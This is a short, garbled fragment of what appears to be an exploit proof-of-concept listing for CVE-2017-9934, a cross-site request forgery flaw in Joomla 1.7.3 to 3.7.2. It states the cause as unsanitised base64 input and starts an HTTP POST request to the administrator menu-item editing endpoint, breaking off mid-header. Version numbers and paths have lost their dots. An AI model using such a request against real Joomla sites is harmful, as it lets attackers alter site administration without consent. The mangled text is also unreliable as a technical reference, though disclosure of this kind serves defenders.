Joomla 1.7.3 - 3.7.2 CSRF exploit PoC
CVE-2017-9934 (I am the reporter of this exploit, under name: Envo) Joomla 173 - 372 CSRF exploit PoC This vulnerability works due to Joomla versions 173 to 372 not sanitizing base64 input #Headers: POST localhost/joomla/administrator/indexphp?option=com_menus&view=item&client_id=0&layout=edit&id=0 HTTP/11 User-Agent: Mozilla/5